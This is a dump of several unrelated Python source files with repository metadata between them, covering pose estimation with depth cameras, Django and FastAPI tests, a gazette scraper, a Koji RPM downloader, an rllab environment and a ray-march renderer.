if len(pose_entries[n]) == 0:
continue
pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
for kpt_id in range(num_keypoints):
if pose_entries[n][kpt_id] != -1.0: # keypoint was found
pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
pose = Pose(pose_keypoints, pose_entries[n][24]) #TODO:这里原来是18,不知道是用于什么
current_poses.append(pose) # 存储不同人体的pose信息
if track:
track_poses(previous_poses, current_poses, smooth=smooth)
previous_poses = current_poses
for pose in current_poses:
pose.draw(img)
for idx, pair in enumerate(KPTS_ANGLE_PAIRS): # 对肘、膝关节进行关节角度测量
joint_forward = (pose.keypoints[pair[0]][1], pose.keypoints[pair[0]][0])
joint = (pose.keypoints[pair[1]][1], pose.keypoints[pair[1]][0])
joint_backward = (pose.keypoints[pair[2]][1], pose.keypoints[pair[2]][0])
if joint[0]*joint[1] > -1:
if joint_forward[0]*joint_forward[1] > 1 and joint_backward[0]*joint_backward[1] > 1:
joint_forward_depth = depth_img[joint_forward[0], joint_forward[1]] * 0.001
joint_depth = depth_img[joint[0], joint[1]] * 0.001
joint_backward_depth = depth_img[joint_backward[0], joint_backward[1]] * 0.001
if joint_backward_depth * joint_depth * joint_forward_depth > 0:
joint_forward_location = ( - (joint_forward[0] - camera_px) * joint_forward_depth / camera_fx, - (joint_forward[1] - camera_py) * joint_forward_depth / camera_fy, joint_forward_depth)
joint_location = ( - (joint[0] - camera_px) * joint_depth / camera_fx, - (joint[1] - camera_py) * joint_depth / camera_fy, joint_depth)
joint_backward_location = ( - (joint_backward[0] - camera_px) * joint_backward_depth / camera_fx, - (joint_backward[1] - camera_py) * joint_backward_depth / camera_fy, joint_backward_depth)
joint_angle = cal_joint_angle(joint_forward_location, joint_location, joint_backward_location)
keypoint_angel[idx] = joint_angle #获得关节角度
# cv2.rectangle(img, (joint[1], joint[0]), (joint[1]+45, joint[0]-12), (255,255,255), thickness=-1)
# cv2.putText(img, '%.1f'%joint_angle+'', (joint[1], joint[0]), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 0), thickness=1)
# else:
# cv2.rectangle(img, (joint[1], joint[0]), (joint[1]+45, joint[0]-12), (255,255,255), thickness=-1)
# cv2.putText(img, 'Null', (joint[1], joint[0]), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 0), thickness=1)
for pose in current_poses:
cv2.rectangle(img, (pose.bbox[0], pose.bbox[1]),
(pose.bbox[0] + pose.bbox[2], pose.bbox[1] + pose.bbox[3]), (0, 255, 0))
if track:
cv2.putText(img, 'human pose: {}'.format(pose.id), (pose.bbox[0], pose.bbox[1] - 16),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
return keypoint_angel, img
def cal_joint_angle(point1, point2, point3):
# 计算三点的角度,以点2为顶点
a=math.sqrt((point2[0]-point3[0])*(point2[0]-point3[0])+(point2[1]-point3[1])*(point2[1] - point3[1])+(point2[2]-point3[2])*(point2[2] - point3[2]))
b=math.sqrt((point1[0]-point3[0])*(point1[0]-point3[0])+(point1[1]-point3[1])*(point1[1] - point3[1])+(point1[2]-point3[2])*(point1[2] - point3[2]))
c=math.sqrt((point1[0]-point2[0])*(point1[0]-point2[0])+(point1[1]-point2[1])*(point1[1] - point2[1])+(point1[2]-point2[2])*(point1[2] - point2[2]))
B=math.degrees(math.acos((b*b-a*a-c*c)/(-2*a*c)))
return B
def kalman(keypoint_angle):
global kalman_kpt_old
global Accumulated_Error
kalman_kpt = np.zeros(6, np.float32)
for i in range(len(keypoint_angle)):
#处理异常点
if(keypoint_angle[i] == 0 and kalman_kpt_old[i]-keypoint_angle[i]>40):
keypoint_angle[i] = kalman_kpt_old[i]
# 新的值相比旧的值差太大时进行跟踪
if (abs(keypoint_angle[i]-kalman_kpt_old[i])/SCOPE > 0.25):
Old_Input = keypoint_angle[i]*0.382 + kalman_kpt_old[i]*0.618
else:
Old_Input = kalman_kpt_old[i]
# 上一轮的 总误差=累计误差^2+预估误差^2
Old_Error_All = (Accumulated_Error[i]**2 + Q**2)**(1/2)
# R为这一轮的预估误差
# H为利用均方差计算出来的双方的相信度
H = Old_Error_All**2/(Old_Error_All**2 + R**2)
# 旧值 + 1.00001/(1.00001+0.1) * (新值-旧值)
kalman_kpt[i] = Old_Input + H * (keypoint_angle[i] - Old_Input)
# 计算新的累计误差
Accumulated_Error[i] = ((1 - H)*Old_Error_All**2)**(1/2)
# 新值变为旧值
kalman_kpt_old[i] = kalman_kpt[i]
return kalman_kpt
class Window(QWidget):
def __init__(self):
super().__init__()
self.win = pq.GraphicsLayoutWidget(show=True)
self.win.setWindowTitle('人体关节角度值')
self.p1 = self.win.addPlot(title="右肘")
self.p1.setRange(yRange = [0,180])
self.p2 = self.win.addPlot(title="左肘")
self.p2.setRange(yRange = [0,180])
self.win.nextRow()
self.p3 = self.win.addPlot(title="右膝")
self.p3.setRange(yRange = [0,180])
self.p4 = self.win.addPlot(title="左膝")
self.p4.setRange(yRange = [0,180])
self.win.nextRow()
self.p5 = self.win.addPlot(title="右脚")
self.p5.setRange(yRange = [0,180])
self.p6 = self.win.addPlot(title="左脚")
self.p6.setRange(yRange = [0,180])
self.keypoints_angel = np.zeros([6,1000],np.float32)
# self.keypoint_angel_filtered = np.zeros(1000,np.float32)
self.curve1 = self.p1.plot(self.keypoints_angel[0,:], name="mode1")
# self.curve1_1 = self.p1.plot(self.keypoint_angel_filtered, name="mode1", pen='w')
self.curve2 = self.p2.plot(self.keypoints_angel[1,:], name="mode1")
self.curve3 = self.p3.plot(self.keypoints_angel[2,:], name="mode1")
self.curve4 = self.p4.plot(self.keypoints_angel[3,:], name="mode1")
self.curve5 = self.p5.plot(self.keypoints_angel[4,:], name="mode1")
self.curve6 = self.p6.plot(self.keypoints_angel[5,:], name="mode1")
# 设定定时器
self.timer = pq.QtCore.QTimer()
self.timer_drow = pq.QtCore.QTimer()
# 定时器信号绑定 update_data 函数
self.timer.timeout.connect(self.update_data)
self.timer_drow.timeout.connect(self.display)
# 定时器间隔100ms
self.timer.start(50)
self.timer_drow.start(100)
# 相机初始化
self.pipeline = rs.pipeline()
self.config = rs.config()
self.config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
self.config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
self.align = rs.align(rs.stream.color)
self.pipeline.start(self.config)
# 网络加载
self.net = PoseEstimationWithMobileNet()
self.checkpoint_path = 'checkpoint_iter_33000.pth'
self.checkpoint = torch.load(self.checkpoint_path, map_location='cpu')
load_state(self.net, self.checkpoint)
# 数据左移
def update_data(self):
frames = self.pipeline.wait_for_frames()
aligned_frames = self.align.process(frames)
depth_frame = aligned_frames.get_depth_frame()
color_frame = aligned_frames.get_color_frame()
color_image = np.asanyarray(color_frame.get_data())
depth_image = np.asanyarray(depth_frame.get_data())
self.keypoints_angel[:,:-1] = self.keypoints_angel[:,1:]
# self.keypoint_angel_filtered[:-1] = self.keypoint_angel_filtered[1:]
keypoints_angel, self.img = pose_estimate(self.net, color_image, depth_image, height_size=256, cpu=0, track=1, smooth=1)
# 对每个关键角度做卡尔曼滤波
keypoints_angel_filtered = kalman(keypoints_angel)
for i in range(len(keypoints_angel_filtered)):
self.keypoints_angel[i,-1] = keypoints_angel_filtered[i]
# self.keypoints_angel[i,-1] = keypoints_angel[i]
# 数据填充到绘制曲线中
self.curve1.setData(self.keypoints_angel[0,:])
# self.curve1_1.setData(self.keypoint_angel_filtered)
self.curve2.setData(self.keypoints_angel[1,:])
self.curve3.setData(self.keypoints_angel[2,:])
self.curve4.setData(self.keypoints_angel[3,:])
self.curve5.setData(self.keypoints_angel[4,:])
self.curve6.setData(self.keypoints_angel[5,:])
def display(self):
cv2.waitKey(1)
cv2.imshow('Rehabilitation Action Assessment', self.img)
# np.savetxt('data.csv', self.keypoints_angel, delimiter = ',')
def __del__(self):
cv2.destroyAllWindows()
self.pipeline.stop()
if __name__ == '__main__':
import sys
# PyQt5 程序固定写法
app = QApplication(sys.argv)
# 将绑定了绘图控件的窗口实例化并展示
window = Window()
# window.show() #TODO: 这个会多出一个空白窗口,注释掉就不会出现了
# PyQt5 程序固定写法
sys.exit(app.exec()) | 11,798 | 1 | 240 |
6b7ea80d74bd122a5019eb14a389e7445ba04672 | 532 | py | Python | Exercicio41a50/ex041.py | ItamarHavenstein/Python | fe536302aea00a4a898e0f54f5b9fa6aba3301cb | [
"MIT"
] | null | null | null | Exercicio41a50/ex041.py | ItamarHavenstein/Python | fe536302aea00a4a898e0f54f5b9fa6aba3301cb | [
"MIT"
] | null | null | null | Exercicio41a50/ex041.py | ItamarHavenstein/Python | fe536302aea00a4a898e0f54f5b9fa6aba3301cb | [
"MIT"
] | null | null | null | import datetime
nascimento = int(input('Digite seu ano de nascimento: '))
anoAtual = datetime.date.today().year
idade = anoAtual - nascimento
print('A idade do atleta é {}'.format(idade))
if idade <= 9:
print('A categoria do atleta é MIRIM')
elif idade > 9 and idade <= 14:
print('A categoria do atleta é INFANTIL')
elif idade > 14 and idade <= 19:
print('A categoria do atleta é JUNIOR')
elif idade > 19 and idade <= 25:
print('A categoria do atleta é SÊNIOR')
else:
print('A categoria do atleta é MASTER')
| 26.6 | 57 | 0.684211 | import datetime
nascimento = int(input('Digite seu ano de nascimento: '))
anoAtual = datetime.date.today().year
idade = anoAtual - nascimento
print('A idade do atleta é {}'.format(idade))
if idade <= 9:
print('A categoria do atleta é MIRIM')
elif idade > 9 and idade <= 14:
print('A categoria do atleta é INFANTIL')
elif idade > 14 and idade <= 19:
print('A categoria do atleta é JUNIOR')
elif idade > 19 and idade <= 25:
print('A categoria do atleta é SÊNIOR')
else:
print('A categoria do atleta é MASTER')
| 0 | 0 | 0 |
c570c4bbc8d1f3c0e2b8593b955f43f6512aace4 | 1,731 | py | Python | wikigame/test_csv_data_extracter.py | danieldourado/camara-mirim-crawler | a00476a6b85acd788265f1be05e5c4dff7c63226 | [
"MIT"
] | null | null | null | wikigame/test_csv_data_extracter.py | danieldourado/camara-mirim-crawler | a00476a6b85acd788265f1be05e5c4dff7c63226 | [
"MIT"
] | 21 | 2019-12-26T16:41:19.000Z | 2022-03-21T22:16:22.000Z | wikigame/test_csv_data_extracter.py | danieldourado/plenarinho-util | a00476a6b85acd788265f1be05e5c4dff7c63226 | [
"MIT"
] | null | null | null | from django.test import TestCase
from .models import WikiGame, WikiTermos
from .csv_data_extracter import extract_data_from_csv, save_termos, save_wikigame, extract_termos_from_string, refresh_wikigame_model | 45.552632 | 163 | 0.671288 | from django.test import TestCase
from .models import WikiGame, WikiTermos
from .csv_data_extracter import extract_data_from_csv, save_termos, save_wikigame, extract_termos_from_string, refresh_wikigame_model
class CSVDETestCase(TestCase):
mockup = {}
def setUp(self):
self.mockup = [
{"termo":"cidadão","texto":"texto1 estados candidatos","out_links":"*estados[estado]*Poder Legislativo *candidatos[candidato]","imagem":"imagem_0001"},
{"termo":"estado","texto":"texto1 cidadãos","out_links":"*cidadãos[cidadão]","imagem":"imagem_0002"},
{"termo":"candidato","texto":"texto1 cidadãos","out_links":"*Poder Legislativo","imagem":"imagem_0003"},
{"termo":"Poder Legislativo","texto":"texto1 cidadãos","out_links":"*cidadãos[cidadão]","imagem":"imagem_0004"}]
def test_extract_data_from_csv(self):
data = extract_data_from_csv()
self.assertTrue(data)
def test_save_termos(self):
save_termos(self.mockup)
print("Termos salvos:")
for termo in WikiTermos.objects.all():
print(termo.name)
self.assertEqual(WikiTermos.objects.all().count(), len(self.mockup))
def test_extract_termos_from_string(self):
save_termos(self.mockup)
termos = extract_termos_from_string(self.mockup[0]['out_links'])
self.assertEqual(len(termos),3)
def test_save_wikigame(self):
save_termos(self.mockup)
save_wikigame(self.mockup)
self.assertEqual(WikiGame.objects.all().count(), len(self.mockup))
def test_refresh_wikigame_model(self):
refresh_wikigame_model()
self.assertTrue(WikiGame.objects.all().count() != 0) | 1,295 | 214 | 23 |
b46218f0c0260e786fb670c6e75ded1567d9cbcd | 1,160 | py | Python | Learning Unittests/matplotlib-tutorial-master/scripts/rain-static.py | BethWIntera/Beths_PySandbox | 6fb1d41353d29be4f7142c722cce8ec9872863e4 | [
"TCL",
"SWL",
"MIT",
"X11",
"BSD-3-Clause"
] | 6 | 2019-10-22T19:45:51.000Z | 2022-02-13T11:11:37.000Z | resources/Rougier Tutorial/scripts/rain-static.py | nstarman/2019-10-22-dotAstronomy-Plotting-Workshop | 31e1a10b3d0f051a2cd197ce390bcf96753f153c | [
"MIT"
] | 5 | 2019-11-15T02:00:26.000Z | 2021-01-06T04:26:40.000Z | resources/Rougier Tutorial/scripts/rain-static.py | nstarman/2019-10-22-dotAstronomy-Plotting-Workshop | 31e1a10b3d0f051a2cd197ce390bcf96753f153c | [
"MIT"
] | null | null | null | # -----------------------------------------------------------------------------
# Copyright (c) 2015, Nicolas P. Rougier. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
# New figure with white background
fig = plt.figure(figsize=(6,6), facecolor='white')
# New axis over the whole figureand a 1:1 aspect ratio
ax = fig.add_axes([0.005,0.005,.99,.99], frameon=True, aspect=1)
# Number of ring
n = 50
size_min = 50
size_max = 50*50
# Ring position
P = np.random.uniform(0,1,(n,2))
# Ring colors
C = np.ones((n,4)) * (0,0,0,1)
# Alpha color channel goes from 0 (transparent) to 1 (opaque)
C[:,3] = np.linspace(0,1,n)
# Ring sizes
S = np.linspace(size_min, size_max, n)
# Scatter plot
scat = ax.scatter(P[:,0], P[:,1], s=S, lw = 0.5,
edgecolors = C, facecolors='None')
# Ensure limits are [0,1] and remove ticks
ax.set_xlim(0,1), ax.set_xticks([])
ax.set_ylim(0,1), ax.set_yticks([])
# plt.savefig("../figures/rain-static.png",dpi=72)
plt.show()
| 28.292683 | 79 | 0.57069 | # -----------------------------------------------------------------------------
# Copyright (c) 2015, Nicolas P. Rougier. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
# New figure with white background
fig = plt.figure(figsize=(6,6), facecolor='white')
# New axis over the whole figureand a 1:1 aspect ratio
ax = fig.add_axes([0.005,0.005,.99,.99], frameon=True, aspect=1)
# Number of ring
n = 50
size_min = 50
size_max = 50*50
# Ring position
P = np.random.uniform(0,1,(n,2))
# Ring colors
C = np.ones((n,4)) * (0,0,0,1)
# Alpha color channel goes from 0 (transparent) to 1 (opaque)
C[:,3] = np.linspace(0,1,n)
# Ring sizes
S = np.linspace(size_min, size_max, n)
# Scatter plot
scat = ax.scatter(P[:,0], P[:,1], s=S, lw = 0.5,
edgecolors = C, facecolors='None')
# Ensure limits are [0,1] and remove ticks
ax.set_xlim(0,1), ax.set_xticks([])
ax.set_ylim(0,1), ax.set_yticks([])
# plt.savefig("../figures/rain-static.png",dpi=72)
plt.show()
| 0 | 0 | 0 |
76f9fcd8cbfb281fd98572b67802852dd900e5e0 | 328 | py | Python | app/tests/test_main.py | BrianThomasRoss/ds-bw | e2dcb909d48cdbcb5918e16ae26b0d1a70c1c36c | [
"MIT"
] | null | null | null | app/tests/test_main.py | BrianThomasRoss/ds-bw | e2dcb909d48cdbcb5918e16ae26b0d1a70c1c36c | [
"MIT"
] | null | null | null | app/tests/test_main.py | BrianThomasRoss/ds-bw | e2dcb909d48cdbcb5918e16ae26b0d1a70c1c36c | [
"MIT"
] | null | null | null | """Main application unittests."""
from fastapi.testclient import TestClient
from app.main import app
client = TestClient(app)
def test_docs():
"""Return HTML docs for root route."""
response = client.get('/')
assert response.status_code == 200
assert response.headers['content-type'].startswith('text/html')
| 23.428571 | 67 | 0.710366 | """Main application unittests."""
from fastapi.testclient import TestClient
from app.main import app
client = TestClient(app)
def test_docs():
"""Return HTML docs for root route."""
response = client.get('/')
assert response.status_code == 200
assert response.headers['content-type'].startswith('text/html')
| 0 | 0 | 0 |
7da5914781a84876cf010359d3fd910b3fd35a8f | 189 | py | Python | data_collection/gazette/spiders/sc_saltinho.py | Jefersonalves/diario-oficial | 9a4bdfe2e31414c993d88831a67160c49a5ee657 | [
"MIT"
] | 3 | 2021-08-18T17:50:31.000Z | 2021-11-12T23:36:33.000Z | data_collection/gazette/spiders/sc_saltinho.py | Jefersonalves/diario-oficial | 9a4bdfe2e31414c993d88831a67160c49a5ee657 | [
"MIT"
] | 4 | 2021-02-10T02:36:48.000Z | 2022-03-02T14:55:34.000Z | data_collection/gazette/spiders/sc_saltinho.py | Jefersonalves/diario-oficial | 9a4bdfe2e31414c993d88831a67160c49a5ee657 | [
"MIT"
] | null | null | null | from gazette.spiders.base import FecamGazetteSpider
| 23.625 | 51 | 0.767196 | from gazette.spiders.base import FecamGazetteSpider
class ScSaltinhoSpider(FecamGazetteSpider):
name = "sc_saltinho"
FECAM_QUERY = "cod_entidade:228"
TERRITORY_ID = "4215356"
| 0 | 113 | 23 |
e5daec4c060e5b408bdc03a6009a4ee4f7ac2cd8 | 3,340 | py | Python | services/Runner/externalServices/manager.py | muhammad-abbady/JenTab | df7b1450cb14e64edade30ea7de49d05a7d7dbf2 | [
"Apache-2.0"
] | 9 | 2021-03-23T11:32:40.000Z | 2022-03-31T13:58:41.000Z | services/Runner/externalServices/manager.py | muhammad-abbady/JenTab | df7b1450cb14e64edade30ea7de49d05a7d7dbf2 | [
"Apache-2.0"
] | null | null | null | services/Runner/externalServices/manager.py | muhammad-abbady/JenTab | df7b1450cb14e64edade30ea7de49d05a7d7dbf2 | [
"Apache-2.0"
] | 1 | 2021-04-29T21:27:08.000Z | 2021-04-29T21:27:08.000Z | import config
import json
import traceback
import requests
# maximum length of an error message to be stored
# excessive error messages might make it properly to the manager
MAX_ERROR_LENGTH = 2 * 1024 * 1024
# create an instance for export
Manager = Manager_Service()
| 33.069307 | 85 | 0.596407 | import config
import json
import traceback
import requests
# maximum length of an error message to be stored
# excessive error messages might make it properly to the manager
MAX_ERROR_LENGTH = 2 * 1024 * 1024
class Manager_Service():
root = config.manager_url
def get_work(self):
"""retrieve a new work package from the manager node"""
url = '{}/getWork'.format(self.root)
resp = requests.post(
url,
params={'client': config.client_id},
auth=requests.auth.HTTPBasicAuth(config.USER_NAME, config.USER_PASSWORD),
)
if resp.status_code == 200:
return resp.json()
else:
return None
def get_desc(self, year, round, table):
"""
retrieve a the package specified from the manager node
this will not (!) assign the corresponding table to this client
only meant for debug use
"""
url = '{}/getDescription'.format(self.root)
resp = requests.post(
url,
params={'year': year, 'round': round, 'table': table},
auth=requests.auth.HTTPBasicAuth(config.USER_NAME, config.USER_PASSWORD),
)
if resp.status_code == 200:
return resp.json()
else:
return None
def store_result(self, table, result):
"""store a result for the given table in the manager node"""
url = '{}/storeResult/{}/'.format(self.root, table)
resp = requests.put(
url,
params={'client': config.client_id},
data=json.dumps(result),
auth=requests.auth.HTTPBasicAuth(config.USER_NAME, config.USER_PASSWORD),
)
return resp.status_code == 200
def store_error(self, table, errors=None):
"""store the last error for the given table in the manager node"""
url = '{}/storeError/{}/'.format(self.root, table)
# get error content
trace = traceback.format_exc()
# cut the error messages at a maximum length
if len(trace) > MAX_ERROR_LENGTH:
trace = trace[-MAX_ERROR_LENGTH:]
# submit the error
resp = requests.put(
url,
params={'client': config.client_id},
data=trace.encode('utf-8'),
auth=requests.auth.HTTPBasicAuth(config.USER_NAME, config.USER_PASSWORD),
)
return resp.status_code == 200
def store_analysisData(self, table, data):
"""store analysis data the manager node"""
url = '{}/storeAnalysisData/{}/'.format(self.root, table)
resp = requests.put(
url,
params={'client': config.client_id},
data=json.dumps(data),
auth=requests.auth.HTTPBasicAuth(config.USER_NAME, config.USER_PASSWORD),
)
return resp.status_code == 200
def audit_lst(self, records):
"""retrieve a new work package from the manager node"""
url = '{}/audit_lst'.format(self.root)
resp = requests.post(
url,
params={'client': config.client_id},
data=json.dumps(records),
auth=requests.auth.HTTPBasicAuth(config.USER_NAME, config.USER_PASSWORD),
)
return resp.status_code == 200
# create an instance for export
Manager = Manager_Service()
| 0 | 3,044 | 23 |
bdf7197d3017603e7d978b7cd8b575326cdce351 | 2,400 | py | Python | bld2repo/bld2repo/cli.py | ppisar/modulemd-tools | 1296439248e14fe3b2e17a2141975e68d3dc9be1 | [
"MIT"
] | 23 | 2020-07-26T14:49:46.000Z | 2022-03-30T03:38:41.000Z | bld2repo/bld2repo/cli.py | ppisar/modulemd-tools | 1296439248e14fe3b2e17a2141975e68d3dc9be1 | [
"MIT"
] | 44 | 2020-06-25T12:59:51.000Z | 2022-03-31T11:45:31.000Z | bld2repo/bld2repo/cli.py | ppisar/modulemd-tools | 1296439248e14fe3b2e17a2141975e68d3dc9be1 | [
"MIT"
] | 13 | 2020-06-25T12:53:16.000Z | 2021-09-06T06:25:54.000Z | import argparse
import os
from bld2repo import (get_buildrequire_pkgs_from_build, add_rpm_urls, rpm_bulk_download,
create_repo)
from bld2repo.config import Config
from bld2repo.utils import get_koji_session
if __name__ == "__main__":
main()
| 40.677966 | 98 | 0.642083 | import argparse
import os
from bld2repo import (get_buildrequire_pkgs_from_build, add_rpm_urls, rpm_bulk_download,
create_repo)
from bld2repo.config import Config
from bld2repo.utils import get_koji_session
def get_arg_parser():
description = (
"When provided with a build id it will download all buildrequired RPMs"
"of a modular koji build into the provided directory and create a repository out of it."
)
parser = argparse.ArgumentParser("bld2repo", description=description,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-b", "--build-id", required=True, type=int, help="ID of a koji build.")
parser.add_argument("-d", "--result-dir", help="Directory where the RPMs are downloaded.",
default=".", type=str)
parser.add_argument("-a", "--arch", help=("For which architecture the RPMs should be download"
"ed. The 'noarch' is included automatically."),
default="x86_64", type=str)
parser.add_argument("-k", "--koji-host", type=str,
default="https://koji.fedoraproject.org/kojihub",
help="Koji host base url")
parser.add_argument("-s", "--koji-storage-host", type=str,
default="https://kojipkgs.fedoraproject.org",
help=("Koji storage storage host base url. Server where the RPMs are "
"stored. Required to be used together with `--koji-host`."))
return parser
def main():
parser = get_arg_parser()
args = parser.parse_args()
koji_host_dflt = parser.get_default("koji_host")
if args.koji_host != koji_host_dflt:
koji_storage_dflt = parser.get_default("koji_storage_host")
if args.koji_storage_host == koji_storage_dflt:
parser.error("--koji-host and --koji-storage-host need to be used to together.")
config = Config(args.koji_host, args.koji_storage_host, args.arch, args.result_dir)
session = get_koji_session(config)
pkgs = get_buildrequire_pkgs_from_build(args.build_id, session, config)
pkgs, rpm_num = add_rpm_urls(pkgs, config)
rpm_bulk_download(pkgs, rpm_num, config.result_dir)
create_repo(config.result_dir)
if __name__ == "__main__":
main()
| 2,081 | 0 | 46 |
5eba01cc06175f5868b76bf826bf0d4381e28d47 | 1,101 | py | Python | sandbox/finetuning/envs/mujoco/gather/swimmer_gather_unevenfloor_env.py | andrewli77/rllab-finetuning | 2dae9141d0fdc284d04f18931907131d66b43023 | [
"MIT"
] | 23 | 2020-04-27T23:53:44.000Z | 2022-03-10T03:13:16.000Z | sandbox/finetuning/envs/mujoco/gather/swimmer_gather_unevenfloor_env.py | WeiChengTseng/rllab-finetuning | 2dae9141d0fdc284d04f18931907131d66b43023 | [
"MIT"
] | 1 | 2021-11-14T13:30:22.000Z | 2021-11-14T13:30:22.000Z | sandbox/finetuning/envs/mujoco/gather/swimmer_gather_unevenfloor_env.py | WeiChengTseng/rllab-finetuning | 2dae9141d0fdc284d04f18931907131d66b43023 | [
"MIT"
] | 8 | 2020-06-17T03:28:34.000Z | 2022-03-09T03:13:03.000Z | from rllab.envs.mujoco.gather.gather_env import GatherEnv
from sandbox.finetuning.envs.mujoco.swimmer_unevenfloor_env import SwimmerUnevenFloorEnv
if __name__ == "__main__":
env = SwimmerGatherUnevenFloorEnv()
while True:
env.reset()
for _ in range(1000):
env.render()
_, reward, _, _ = env.step(env.action_space.sample()) # take a random action
# env.reset()
# frames = []
# for i in range(5):
# print(i)
# frames.append(env.render(mode='rgb_array'))
# _, reward, _, _ = env.step(env.action_space.sample()) # take a random action
#
# import skvideo.io
# import numpy as np
# output_data = np.array(frames)
# import IPython; IPython.embed()
# output_data = output_data.astype(np.uint8)
# import os.path as osp
# import rllab.config as config
#
# output_path = osp.join(config.PROJECT_PATH, "data/local/outputvideo.mp4")
# skvideo.io.vwrite(output_path, output_data) | 33.363636 | 89 | 0.660309 | from rllab.envs.mujoco.gather.gather_env import GatherEnv
from sandbox.finetuning.envs.mujoco.swimmer_unevenfloor_env import SwimmerUnevenFloorEnv
class SwimmerGatherUnevenFloorEnv(GatherEnv):
MODEL_CLASS = SwimmerUnevenFloorEnv
ORI_IND = 2
if __name__ == "__main__":
env = SwimmerGatherUnevenFloorEnv()
while True:
env.reset()
for _ in range(1000):
env.render()
_, reward, _, _ = env.step(env.action_space.sample()) # take a random action
# env.reset()
# frames = []
# for i in range(5):
# print(i)
# frames.append(env.render(mode='rgb_array'))
# _, reward, _, _ = env.step(env.action_space.sample()) # take a random action
#
# import skvideo.io
# import numpy as np
# output_data = np.array(frames)
# import IPython; IPython.embed()
# output_data = output_data.astype(np.uint8)
# import os.path as osp
# import rllab.config as config
#
# output_path = osp.join(config.PROJECT_PATH, "data/local/outputvideo.mp4")
# skvideo.io.vwrite(output_path, output_data) | 0 | 81 | 23 |
f044b60a0ff24131432e7e5141763c3749fa4897 | 210 | py | Python | django_easy_ajax/urls.py | ApptecSrl/django-easy-ajax | 4931ab1aa51564bfda7328665cb5b078b6f5b132 | [
"BSD-3-Clause"
] | null | null | null | django_easy_ajax/urls.py | ApptecSrl/django-easy-ajax | 4931ab1aa51564bfda7328665cb5b078b6f5b132 | [
"BSD-3-Clause"
] | null | null | null | django_easy_ajax/urls.py | ApptecSrl/django-easy-ajax | 4931ab1aa51564bfda7328665cb5b078b6f5b132 | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^(?P<strategy_name>[-\w]+)/(?P<pk>\d+)/$', views.AjaxBaseSerializedView.as_view(),
name='django-easy-ajax-selector'),
]
| 21 | 92 | 0.647619 | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^(?P<strategy_name>[-\w]+)/(?P<pk>\d+)/$', views.AjaxBaseSerializedView.as_view(),
name='django-easy-ajax-selector'),
]
| 0 | 0 | 0 |
5887dcecd81a99876c5c5c6ee478e6117c74d657 | 23,348 | py | Python | rayMarchRenderer.py | s-neilson/Python-ray-march-renderer | c3850336686a4853c9658f2dff49566e71872470 | [
"MIT"
] | null | null | null | rayMarchRenderer.py | s-neilson/Python-ray-march-renderer | c3850336686a4853c9658f2dff49566e71872470 | [
"MIT"
] | null | null | null | rayMarchRenderer.py | s-neilson/Python-ray-march-renderer | c3850336686a4853c9658f2dff49566e71872470 | [
"MIT"
] | null | null | null | import copy
import math
import numpy
from tqdm import tqdm
import matplotlib.pyplot as plt
#A class for three-dimentional vector operations; using numpy arrays and their operations was found to be slower.
#Returns the unit vector pointing from the location represented by fromVector to the location represented by toVector.
#Returns the direction that the original ray used in rayMarch should be in in order to correspond to a certain pixel in the image given by the coordinates
#pixelX,pixelY. The camera is assumed to be a pinhole comera with an infinitely small aperture.
#An infinite flat plane described by the equation ax+by+cz+d=0
#Determines the total intensity of red, green and blue light impacting point rayOrigin using the ray marching algorithm.
aspectRatio=1.0
imageHeight=50
imageWidth=int(aspectRatio*imageHeight)
fieldOfView=math.pi/2.0
cameraLocation=Vector3D(0.0,0.0,0.0)
screenDistance=(0.5*aspectRatio)/(math.tan(fieldOfView/2.0)) #The screen is assumed to have a height of 1 unit, meaning that it's width is equal to "aspectRatio".
imageData=numpy.zeros(shape=(imageHeight,imageWidth,3))
minimumCollisionDistance=0.005
maximumRayMarchStepCount=400
maximumRayMarchDistance=300.0
maximumRecursiveDepth=7
minimiseDiffuseInterreflections=True
#The scene is created below
ground=Plane(a=0.0,b=1.0,c=0.0,location=Vector3D(0.0,-2.0,0.0),colour=Vector3D(255.0,70.0,40.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
backWall=Plane(a=0.0,b=0.0,c=-1.0,location=Vector3D(0.0,0.0,40.0),colour=Vector3D(170.0,180.0,250.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
leftWall=Plane(a=1.0,b=0.0,c=0.0,location=Vector3D(-20.0,0.0,-0.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
rightWall=Plane(a=-1.0,b=0.0,c=0.0,location=Vector3D(20.0,0.0,20.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
frontWall=Plane(a=0.0,b=0.0,c=1.0,location=Vector3D(0.0,0.0,-40.0),colour=Vector3D(100.0,190.0,170.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
topLight=Plane(a=0.0,b=-1.0,c=0.0,location=Vector3D(0.0,30.0,0.0),colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=1.0)
sphere1=Sphere(location=Vector3D(-2.0,-0.25,5.0),radius=1.5,colour=Vector3D(215.0,250.0,190.0),diffuse=False,refractiveIndex=1.5,brightness=0.0)
sphere2=Sphere(location=Vector3D(0.5,1.0,6.0),radius=1.2,colour=Vector3D(255.0,255.0,255.0),diffuse=False,refractiveIndex=100.0,brightness=0.0)
sphere3=Sphere(location=Vector3D(1.5,0.6,3.0),radius=0.5,colour=Vector3D(80.0,40.0,120.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
